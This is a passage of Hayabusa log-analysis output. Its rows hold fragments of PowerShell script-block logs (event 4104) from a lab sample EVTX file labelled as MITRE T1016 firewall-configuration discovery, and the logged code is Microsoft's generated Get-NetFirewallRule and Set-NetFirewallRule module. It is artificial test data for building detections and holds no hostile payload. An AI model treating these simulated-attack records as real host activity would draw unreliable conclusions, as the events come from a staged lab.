[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and 
(@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.Conta",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"insKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', 
$__cmdletizatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; 